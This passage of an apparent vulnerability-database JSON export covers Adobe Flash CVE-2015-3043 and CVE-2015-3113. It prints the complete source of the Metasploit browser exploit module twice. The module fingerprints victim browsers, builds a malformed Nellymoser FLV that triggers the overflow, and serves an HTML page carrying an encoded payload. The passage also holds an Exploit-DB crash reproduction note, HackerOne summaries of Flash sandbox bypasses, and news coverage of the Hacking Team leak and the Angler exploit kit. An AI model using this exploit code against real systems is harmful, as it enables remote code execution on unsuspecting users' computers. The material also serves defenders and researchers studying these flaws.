root cause as CVE-2015-3043.\n", "published": "2015-07-01T18:13:57", "type": "metasploit", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043", "CVE-2015-3113"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3043'],\n ['CVE', '2015-3113'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-06-23',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n @flv = create_flv\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n if request.uri =~ /\\.flv$/\n print_status('Sending FLV...')\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\n def create_flv\n header = ''\n header << 'FLV' # signature\n header << [1].pack('C') # version\n header << [4].pack('C') # Flags: TypeFlagsAudio\n header << [9].pack('N') # DataOffset\n\n data = ''\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\n data << \"\\xee\" * 0x440 # SoundData\n\n tag1 = ''\n tag1 << [8].pack('C') # TagType (audio)\n tag1 << \"\\x00\\x04\\x41\" # DataSize\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\n tag1 << [0].pack('C') # TimeStampExtended\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\n tag1 << data\n\n body = ''\n body << [0].pack('N') # PreviousTagSize\n body << tag1\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\n\n flv = ''\n flv << header\n flv << body\n\n flv\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb"}, {"lastseen": "2021-01-09T14:38:02", "description": "This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043.\n", "published": "2015-07-01T18:13:57", "type": "metasploit", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043", "CVE-2015-3113"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\n has been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\n\n Note that this exploit is effective against both CVE-2015-3113 and the\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\n to the same root cause as CVE-2015-3043.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-3043'],\n ['CVE', '2015-3113'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\n when 'Linux'\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-06-23',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n @flv = create_flv\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n if request.uri =~ /\\.flv$/\n print_status('Sending FLV...')\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\n def create_flv\n header = ''\n header << 'FLV' # signature\n header << [1].pack('C') # version\n header << [4].pack('C') # Flags: TypeFlagsAudio\n header << [9].pack('N') # DataOffset\n\n data = ''\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\n data << \"\\xee\" * 0x440 # SoundData\n\n tag1 = ''\n tag1 << [8].pack('C') # TagType (audio)\n tag1 << \"\\x00\\x04\\x41\" # DataSize\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\n tag1 << [0].pack('C') # TimeStampExtended\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\n tag1 << data\n\n body = ''\n body << [0].pack('N') # PreviousTagSize\n body << tag1\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\n\n flv = ''\n flv << header\n flv << body\n\n flv\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash - Heap Buffer Overflow Loading .FLV File with Nellymoser Audio Codec", "edition": 1, "published": "2015-08-19T00:00:00", "title": "Adobe Flash - Heap Buffer Overflow Loading .FLV File with Nellymoser Audio Codec", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-08-19T00:00:00", "id": "EXPLOITPACK:D8E6122E0C3ED28050822787A838C525", "href": "", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\n\nTo reproduce, host the attached files appropriately and:\n\nhttp://localhost/LoadMP4.swf?file=crash4000368.flv\n\nIf there is no crash at first, refresh the page a few times.\n\nWith a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:\n\n=> 0x00007f7789d081bb <__memmove_ssse3_back+443>:\tmovaps %xmm1,-0x10(%rdi)\n\nrdi 0x7f7778d69200\n\n7f777894b000-7f7778d69000 rw-p 00000000 00:00 0 \n7f7778d69000-7f7778d88000 ---p 00000000 00:00 0 \n\nThis looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.\n\nAlso, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37879.zip", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-10-23T18:01:34", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": ["CVE-2015-3044"], "description": "Some of the sandbox logic of Flash Player can be circumvented on most web browsers by using special URL schemes. A website can deploy an SWF file via the data: or blob: URL schemes (perhaps others). An app started in this way runs in the \"local with files\" or \"local with networking\" sandbox, depending on the SWF attributes. This bug can be used in conjunction other attacks such as the Firefox-specific bug reported separately or MITM (CVE-2015-3044) to promote the local sandbox to \"local trusted\". This would allow unlimited cross-domain access.\r\n\r\nOn Chrome, the SWF can simply be encoded in a data: URL. This doesn't appear to work on other browsers (maybe there is a limit on the URL length or something else). On Firefox, Safari (recent versions, not version 5), and Chrome also allow loading the SWF from a blob: URL. On Firefox this apparently requires prefixing the URL with \"feed:\".\r\n\r\nThe vulnerability was patched in May 2015.\r\n", "modified": "2019-10-18T13:00:15", "published": "2015-06-30T14:33:56", "id": "H1:73276", "href": "https://hackerone.com/reports/73276", "type": "hackerone", "title": "Flash (IBB): Internet-based attacker can run Flash apps in local sandboxes by using special URL schemes (PSIRT-3299, CVE-2015-3079)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-23T18:01:35", "bulletinFamily": "bugbounty", "bounty": 2000.0, "cvelist": [], "description": "The vulnerability allows a malicious Flash app on a website to read and write Local Shared Objects belonging to any website. As a special case, LSO's of macromedia.com contain global Flash settings. Overwriting them allows e.g. unlimited access to camera and microphone of the target user. Other attacks are possible too, e.g. disclosure of sensitive information in LSO's (website-dependent) and triggering the double free bug in Flash Player Settings Manager reported separately.\r\n\r\nThe bug can be exploited with malformed jar: URLs on Firefox. Other browsers require other ways of spoofing the host, e.g. HTTP MITM or DNS spoofing.\r\n\r\nThe bug was patched in April 2015 and additional hardening in May 2015.", "modified": "2019-10-18T13:00:00", "published": "2015-05-21T19:39:15", "id": "H1:63324", "href": "https://hackerone.com/reports/63324", "type": "hackerone", "title": "Flash (IBB): Flash Player information disclosure (etc.) CVE-2015-3044, PSIRT-3298", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-10-23T18:01:35", "bulletinFamily": "bugbounty", "bounty": 5000.0, "cvelist": [], "description": "This was patched by https://helpx.adobe.com/security/products/flash-player/apsb15-06.html , described as a \"double-free vulnerabilit[y] that could lead to code execution\".\r\n", "modified": "2019-10-18T12:59:20", "published": "2015-04-15T09:39:23", "id": "H1:56385", "href": "https://hackerone.com/reports/56385", "type": "hackerone", "title": "Flash (IBB): Double free vulnerability in Flash Player Settings Manager (CVE-2015-0346)", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-01-27T09:17:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-0349"], "description": "[![Zero-Day Flash Player Exploit Disclosed in Hacking Team Data Dump](https://1.bp.blogspot.com/-8wY-4N6x8oM/VZwCe65zOLI/AAAAAAAAjdY/XKMY5D3jbOA/s1600/flash-Player-zero-day-vulnerability.jpg)](<https://1.bp.blogspot.com/-8wY-4N6x8oM/VZwCe65zOLI/AAAAAAAAjdY/XKMY5D3jbOA/s1600/flash-Player-zero-day-vulnerability.jpg>)\n\nThe Recent Cyber Attack that [exposed 400GB of corporate data](<https://thehackernews.com/2015/07/Italian-hacking-team-software.html>) belonging to surveillance software firm Hacking Team has revealed that the spyware company have already discovered an exploit for an unpatched zero-day vulnerability in Flash Player.\n\n \n\n\nSecurity researchers at Trend Micro [claim](<http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/>) that the leaked data stolen from [Hacking Team](<https://thehackernews.com/2014/02/hacking-team-sold-spyware-to-21.html>), an Italian company that sells surveillance software to government agencies, contains a number of unpatched and unreported Adobe flaws.\n\n \n\n\n### Hacking Team has Unpatched Flash Bug \n\n \n\n\nWhile analyzing the leaked data dump, researchers discovered at least three software exploits \u2013 two for Adobe Flash Player and one for Microsoft's Windows kernel.\n\n \n\n\nOut of two, one of the Flash Player vulnerabilities, known as Use-after-free vulnerability with [CVE-2015-0349](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349>), has already been patched.\n\n \n\n\nHowever, the Hacking Team described the other Flash Player exploit, which is a zero-day exploit with no CVE number yet, as \"the most beautiful Flash bug for the last four years.\"\n\n \n\n\nSymantec has also [confirmed](<http://www.symantec.com/connect/blogs/leaked-flash-zero-day-likely-be-exploited-attackers>) the existence of the zero-day flaw in Adobe Flash that could allow hackers to remotely execute code on a targeted computer, actually allowing them to take full control of it.\n\n \n\n\nResearchers found a Flash zero-day proof-of-concept (POC) exploit code that, after testing, successfully worked on the most latest, fully patched version of Adobe Flash (version 18.0.0.194) with Internet Explorer.\n\n \n\n\nSuccessful exploitation of the zero-day Flash vulnerability could cause a system crash, potentially allowing a hacker to take complete control of the affected computer.\n\n \n\n\n### Zero-Day Flash Flaw Affects All Major Browsers\n\n \n\n\nThe zero-day vulnerability affects all major web browsers, including Microsoft's **Internet Explorer**, Google's **Chrome**, Mozilla's **Firefox **as well as Apple's **Safari**.\n\n \n\n\nResearchers have not spotted any attacks in the wild exploiting this zero-day flaw. However, since details of the vulnerability are now made publicly available, it is likely cybercriminals will quickly try to exploit the flaw before a patch is issued.\n\n \n\n\nTherefore, users who are concerned about the issue can temporarily disable the Adobe Flash Player in their browser until the company patches the zero-day flaw.\n", "modified": "2015-07-07T16:49:19", "published": "2015-07-07T05:49:00", "id": "THN:B74D1710436E41A0246F2D91A101DF62", "href": "https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html", "type": "thn", "title": "Zero-Day Flash Player Exploit Disclosed in 'Hacking Team' Data Dump", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:49", "bulletinFamily": "info", "cvelist": ["CVE-2015-0336", "CVE-2015-0359", "CVE-2015-3090"], "description": "While the Angler Exploit Kit may have already established itself as one of the more [sophisticated kits](<https://threatpost.com/analyzing-angler-the-worlds-most-sophisticated-exploit-kit/110904>) on the underground market, it appears it\u2019s still finding ways to evolve.\n\nAngler, this week, was spotted dropping the latest iteration of CryptoWall ransomware and leveraging yet another previously patched Adobe vulnerability.\n\nEarlier this year, the kit was spotted pushing a ransomware hybrid of sorts, [a cross between TeslaCrypt and AlphaCrypt](<https://threatpost.com/angler-exploit-kit-pushing-new-unnamed-ransomware/112751>), along with a handful of Adobe exploits, and instances of the [Bedep Trojan](<https://threatpost.com/angler-exploit-kit-bedep-malware-inflating-video-views/112611>), which goes on to perpetrate click fraud.\n\nBrad Duncan, a handler at SANS Internet Storm Center claims he noticed two instances of Angler sending out Cryptowall 3.0 this week. In the first incident on Tuesday he spotted the kit dropping Bedep as a payload before it moved onto the CryptoWall 3.0. In a separate instance on Wednesday, he observed Angler sending Cryptowall 3.0 on its own.\n\nBoth times, Duncan claims, the ransomware used the same Bitcoin address for payment. Cryptowall also requested the usual figure, $500, to decrypt the victim\u2019s files.\n\n[![Cryptowall3](https://media.threatpost.com/wp-content/uploads/sites/103/2015/05/07003952/2015-05-28-ISC-diary-image-01.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/05/07003952/2015-05-28-ISC-diary-image-01.jpg>)\n\n\u201cI usually see Angler EK send different types of ransomware, and I\u2019ve seen plenty of CryptoWall 3.0 samples from Magnitude EK; however, this is the first time I\u2019ve noticed CryptoWall from Angler EK,\u201d Duncan wrote in a post on [SANS\u2019 InfoSec Community Forums Thursday](<https://isc.sans.edu/forums/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737/>).\n\nThe exploit kit added yet another Adobe Flash Player vulnerability to its arsenal this week, [according to FireEye](<https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html>). A quartet of researchers noticed Angler exploiting CVE-2015-3090 on Tuesday, [about two weeks](<https://threatpost.com/adobe-unleashes-big-updates-for-flash-reader-acrobat/112756>) after [Adobe](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) actually patched the issue, a memory corruption vulnerability dug up by Chris Evans at Google\u2019s Project Zero.\n\nThe kit uses the vulnerability to exploit a race condition in the [shader class](<http://www.sfml-dev.org/documentation/2.0/classsf_1_1Shader.php>) and trigger the vulnerability, making it possible for attackers to execute arbitrary code and infect the systems of users who haven\u2019t updated yet.\n\nThe addition of Adobe exploits to Angler certainly isn\u2019t new by any means but as FireEye points out, it is worrisome.\n\n[In January ](<https://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>)the kit added two Flash vulnerabilities, including a zero day that went onto install Bedep on victims\u2019 machines. In April the kit began exploiting CVE-2015-0359 in Flash and in March it narrowed its sights on CVE-2015-0336, also in Flash, along with [an IE vulnerability](<https://threatpost.com/older-keen-team-use-after-free-ie-exploit-added-to-angler-exploit-kit/111350>).\n\nThe kit matured further in March, adding a nifty trick called [domain shadowing](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>) wherein pilfered domain credentials are used to build lists of subdomains and then used to redirect victims to attack sites.\n", "modified": "2015-06-01T17:43:55", "published": "2015-05-28T13:57:47", "id": "THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3", "href": "https://threatpost.com/angler-exploit-kit-exploiting-new-adobe-vulnerability-dropping-cryptowall-3-0/113044/", "type": "threatpost", "title": "Angler Exploit Kit Exploiting New Adobe Vulnerability, Dropping Cryptowall 3.0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-0345", "CVE-2015-1641", "CVE-2015-1773", "CVE-2015-3043"], "description": "Microsoft has patched a critical vulnerability in the Windows HTTP protocol stack, known as HTTP.sys, which could have devastating consequences once it\u2019s inevitably publicly exploited.\n\nThe bulletin, [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>), is one of four critical bulletins issued today by Microsoft. Experts warn that exploiting the vulnerability is trivial and could lead to remote code execution and privilege escalation on a compromised machine.\n\n\u201cWhat this means is that once an attacker knows how to create the \u2018specially crafted HTTP request\u2019 they can simply start targeting every web server they can find until they hit one that is vulnerable. The first concern is that the work around provided by Microsoft is very limited and doesn\u2019t provide IT admins much to protect themselves while they test and deploy the patch,\u201d said Andrew Storms, vice president security services for New Context. \u201cThe second concern is the sheer number of Windows web servers. There are more Linux servers in terms of total numbers but Windows servers are more popular in the corporate environment and many of them store very valuable assets.\u201d\n\nMicrosoft said a temporary workaround would be to disable IIS kernel caching, but cautioned that this action could cause performance issue. The vulnerability is not being exploited in the wild, Microsoft said, adding that it\u2019s found in Windows 7, Windows Server 2008 R2, Windows 8 and 8.1, Windows Server 2012 and 2012 R2, and in Server Core installation option.\n\n\u201cAn attacker can use the vulnerability to run code on your IIS webserver under the IIS user account. The attacker would then use an exploit for a second local vulnerability to escalate privilege, become administrator and install permanent exploit code,\u201d said Wolfgang Kandek, CTO at Qualys. \u201cThe attack is simple to execute and needs to be addressed quickly, if you cannot patch immediately take a look at the suggested workaround in IIS caching. This is the top vulnerability for your server team if you run Windows based web servers on the Internet.\u201d\n\nCraig Young, security researcher at Tripwire, said the flaw appears to be related to IIS kernel caching support.\n\n\u201cIt\u2019s likely that we\u2019ll see this bug being exploited in the wild in a very short timeframe,\u201d Young said. \u201cInterestingly enough however, MS15-034 does not affect the older Windows Server 2003 IIS platform, indicating that this bug was introduced in the newer IIS releases.\u201d\n\nWindows admins should also rush a critical bulletin that addresses a publicly disclosed vulnerability in Office.\n\n[MS15-033](<https://technet.microsoft.com/library/security/MS15-033>) patches three vulnerabilities that are rated critical for older versions of Office components such as Word 2007 and Office 2010, but rated important for Office 2013, SharePoint Server 2013 and Office Web Apps Server 2013.\n\nOne of the vulnerabilities, CVE-2015-1641, has been publicly disclosed and Microsoft said there are limited attacks trying to exploit the bug, which is a remote code execution memory corruption issue. There are also a pair of use-after-free vulnerabilities in Office that could lead to remote code execution.\n\nThe bulletin also patches a cross-site scripting vulnerability in Microsoft Outlook App for Mac.\n\nMicrosoft today also patched Internet Explorer. The latest cumulative update for the browser includes a number of fixes for vulnerabilities that were privately disclosed during the [Pwn2Own contest](<https://threatpost.com/all-major-browsers-fall-at-pwn2own-day-2/111731>) last month.\n\n[MS15-032](<https://technet.microsoft.com/library/security/MS15-032>) patches 10 vulnerabilities in IE, including nine different memory corruption issues, and an ASLR bypass, none of which are being publicly exploited. The vulnerabilities range from security feature bypass, to elevation of privilege, to information disclosure, to remote code execution.\n\nThe final critical bulletin, [MS15-035](<https://technet.microsoft.com/library/security/MS15-035>), patches a vulnerability in the way Windows processes certain Enhanced Metafile (EMF) graphics and images.\n\n\u201cThe vulnerability could allow remote code execution if an attacker successfully convinces a user to browse to a specially crafted website, open a specially crafted file, or browse to a working directory that contains a specially crafted Enhanced Metafile (EMF) image file,\u201d Microsoft said in its advisory. \u201cIn all cases, however, an attacker would have no way to force users to take such actions; an attacker would have to convince users to do so, typically by way of enticements in email or Instant Messenger messages.\u201d\n\nThere were seven other bulletins released today, all rated important:\n\n * [MS15-036](<https://technet.microsoft.com/library/security/MS15-036>) patches an elevation of privilege vulnerabilities in SharePoint Server\n * [MS15-037](<https://technet.microsoft.com/library/security/MS15-037>) addresses an elevation of privilege vulnerability in Windows Task Scheduler\n * [MS15-038](<https://technet.microsoft.com/library/security/MS15-038>) fixes elevation of privilege vulnerabilities in Windows NTCreate Transaction Manager and MS-DOS\n * [MS15-039](<https://technet.microsoft.com/library/security/MS15-039>) patches a security feature bypass vulnerability in XML Core Services\n * [MS15-040](<https://technet.microsoft.com/library/security/MS15-040>) patches an information disclosure bug in Active Directory Federation Services\n * [MS15-041](<https://technet.microsoft.com/library/security/MS15-041>) patches an information disclosure vulnerability in .NET Framework\n * [MS15-042](<https://technet.microsoft.com/library/security/MS15-042>) patches a denial of service flaw in Windows Hyper-V\n\n**Adobe Patches Flash, 